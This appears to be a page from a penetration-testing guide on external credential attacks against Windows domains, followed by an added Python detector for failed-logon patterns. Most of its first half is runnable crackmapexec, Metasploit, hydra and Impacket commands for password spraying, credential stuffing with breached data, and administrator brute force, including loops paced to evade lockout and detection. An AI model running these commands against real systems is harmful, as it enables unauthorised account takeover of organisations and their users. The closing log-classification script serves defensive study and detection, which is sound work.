This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com.

Non-Authenticated (External) Attacks

Password Spraying

Purpose: Test common passwords across multiple accounts while avoiding lockout thresholds.

Requirements: User list, common passwords, understanding of domain lockout policy

Attack Value: High success rate with common corporate passwords, provides initial domain access with minimal detection risk

Password Policy Discovery

# Extract domain password policy
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol

Password Spraying Execution

# SMB password spraying with delay
crackmapexec smb <DC-IP> -u users.txt -p 'Password123!' --continue-on-success

# Multiple password attempts with lockout consideration
for password in "Password123!" "Welcome2024!" "Company123!"; do
    crackmapexec smb <DC-IP> -u users.txt -p "$password" --continue-on-success
    sleep 1800  # 30-minute delay between password attempts
done

Credential Stuffing

Purpose: Use compromised credentials from external breaches against domain authentication.

Requirements: Breach credential data matching target organization, network access to domain services

Attack Value: High success rate when breach data matches target organization, immediate domain compromise possible

Credential Preparation

# Process breach data for domain-specific attempts
grep "@<company>.com" breached_creds.txt | cut -d: -f1,2 > domain_creds.txt

Credential Stuffing Execution

CrackMapExec Method

# Test credential pairs without brute force permutation
crackmapexec smb <DC-IP> -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success

Metasploit Method

# Credential validation module
use auxiliary/scanner/smb/smb_login
set RHOSTS <DC-IP>
set USERPASS_FILE /path/to/domain_creds.txt
set STOP_ON_SUCCESS false
run

Brute Force Attacks

Purpose: Systematically attempt password combinations against specific high-value accounts.

Requirements: Target administrative accounts, comprehensive password lists, understanding of lockout policies

Attack Value: Direct administrative access upon success, complete system control possible

Targeted Brute Force

CrackMapExec Method

# Single account brute force with lockout avoidance
crackmapexec smb <DC-IP> -u 'administrator' -p passwords.txt --continue-on-success

# Time-delayed brute force for lockout evasion: test only 4 passwords per cycle
# (read line by line so passwords containing spaces are passed intact)
head -4 passwords.txt | while IFS= read -r password; do
    crackmapexec smb <DC-IP> -u 'administrator' -p "$password"
    sleep 5
done
sleep 1800  # Wait 30 minutes before starting the next 4-password cycle

Impacket Method

# Protocol-specific brute force (read via fd 3 so a spawned shell cannot consume the list)
while IFS= read -r password <&3; do
    if python3 psexec.py <domain>/administrator:"$password"@<DC-IP> 2>/dev/null; then
        echo "SUCCESS: administrator:$password"; break
    fi
    sleep 60
done 3< admin_passwords.txt

Metasploit Method

# Multi-protocol brute force
use auxiliary/scanner/smb/smb_login
set RHOSTS <DC-IP>
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/common_passwords.txt
set VERBOSE false
run

# RDP brute force for remote access
use auxiliary/scanner/rdp/rdp_login
set RHOSTS <target-IP>
set USERNAME administrator
set PASS_FILE /usr/share/wordlists/common_passwords.txt
run

Service-Specific Brute Force

# RDP brute force with hydra
hydra -l administrator -P passwords.txt rdp://<target-IP> -t 1 -w 30

# WinRM brute force
crackmapexec winrm <target-IP> -u 'administrator' -p passwords.txt
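Every technique on this page produces Windows Security Event ID 4625 ("An account failed to log on") on the domain controller, and the three differ in shape rather than volume: spraying and credential stuffing touch many accounts with one or two failures each from a single source, while brute force piles failures onto one account until it locks (NTSTATUS 0xC0000234). The following is an added defender-side example, not code from the original guide: it classifies constructed 4625 lines by that shape and shows why the 30-minute pacing used in the brute-force loops above slips under a 30-minute aggregation window but not a daily one. The simplified CSV layout, the thresholds and the IP addresses are assumptions.

```python
"""Triage of failed-logon bursts by shape: password spraying / credential
stuffing vs single-account brute force, from Event ID 4625 records.

Added example, not part of the original guide. The log lines are constructed
samples in a simplified CSV shape (time, EventID, TargetUserName, IpAddress,
Status); layout and thresholds are assumptions for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # aggregation window per source IP (assumed)
SPRAY_MIN_USERS = 5              # distinct accounts hit from one source
SPRAY_MAX_PER_USER = 3           # each account stays under a typical lockout threshold
BRUTE_MIN_ATTEMPTS = 10          # failures against a single account

STATUS_BAD_PASSWORD = "0xC000006A"   # NTSTATUS: wrong password
STATUS_LOCKED_OUT = "0xC0000234"     # NTSTATUS: account locked out


def burst(user, ip, start, count, step, status=STATUS_BAD_PASSWORD):
    """Build `count` constructed 4625 lines for one account, `step` apart."""
    t0 = datetime.fromisoformat(start)
    return "\n".join(f"{(t0 + i * step).isoformat()},4625,{user},{ip},{status}"
                     for i in range(count))


ONE_SEC = timedelta(seconds=1)
SAMPLE_EVENTS = "\n".join([
    # one source, six accounts, one wrong password each: the spraying shape
    "2024-05-01T09:00:01,4625,alice,10.0.0.5,0xC000006A",
    "2024-05-01T09:00:02,4625,bob,10.0.0.5,0xC000006A",
    "2024-05-01T09:00:03,4625,carol,10.0.0.5,0xC000006A",
    "2024-05-01T09:00:04,4625,dave,10.0.0.5,0xC000006A",
    "2024-05-01T09:00:05,4625,erin,10.0.0.5,0xC000006A",
    "2024-05-01T09:00:06,4625,frank,10.0.0.5,0xC000006A",
    "2024-05-01T09:00:07,4624,grace,10.0.0.5,0x0",      # a success: not counted
    # one source hammering one account until it locks: the brute-force shape
    burst("administrator", "10.0.0.9", "2024-05-01T09:10:00", 10, ONE_SEC),
    "2024-05-01T09:10:10,4625,administrator,10.0.0.9,0xC0000234",
    # a user mistyping twice: noise
    "2024-05-01T09:30:00,4625,alice,10.0.0.7,0xC000006A",
    "2024-05-01T09:30:30,4625,alice,10.0.0.7,0xC000006A",
    # slow brute force: 4 guesses, 30-minute pause, 4 more, 30-minute pause, 4 more
    burst("administrator", "10.0.0.11", "2024-05-01T10:00:00", 4, ONE_SEC),
    burst("administrator", "10.0.0.11", "2024-05-01T10:30:00", 4, ONE_SEC),
    burst("administrator", "10.0.0.11", "2024-05-01T11:00:00", 4, ONE_SEC),
])


def parse_events(text):
    """Parse the constructed CSV lines into dicts, skipping blank lines."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        ts, event_id, user, ip, status = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "event_id": int(event_id),
                       "user": user.lower(), "ip": ip, "status": status})
    return events


def classify_sources(events, window=WINDOW):
    """Label each source IP by the shape of its 4625 failures inside `window`,
    measured from that source's first failure (a production rule would slide).

    Spraying and credential stuffing look identical here (many accounts, one or
    two failures each); what separates them, one guessed password vs per-user
    leaked pairs, is not visible in 4625, so they share a label."""
    failures = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["event_id"] == 4625:
            failures[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in failures.items():
        start = evs[0]["time"]
        in_window = [e for e in evs if e["time"] - start <= window]
        per_user = defaultdict(int)
        for e in in_window:
            per_user[e["user"]] += 1
        stats = {
            "attempts": len(in_window),
            "distinct_users": len(per_user),
            "max_per_user": max(per_user.values()),
            "lockouts": sum(e["status"] == STATUS_LOCKED_OUT for e in in_window),
        }
        if stats["distinct_users"] >= SPRAY_MIN_USERS and stats["max_per_user"] <= SPRAY_MAX_PER_USER:
            label = "password_spray_or_credential_stuffing"
        elif stats["distinct_users"] <= 2 and stats["attempts"] >= BRUTE_MIN_ATTEMPTS:
            label = "brute_force"
        else:
            label = "below_threshold"
        findings[ip] = (label, stats)
    return findings


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    for ip, (label, stats) in classify_sources(events).items():
        print(f"{ip:12} {label:38} {stats}")
    print("10.0.0.11 over 24h:", classify_sources(events, window=timedelta(hours=24))["10.0.0.11"][0])
```

The slow source 10.0.0.11 stays "below_threshold" in the 30-minute window and becomes "brute_force" once the window covers the day, which is the practical counter to the `sleep 1800` pacing: aggregate per-account failures over a window longer than the lockout observation window, since legitimate users rarely accumulate ten failures against one account in a day.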
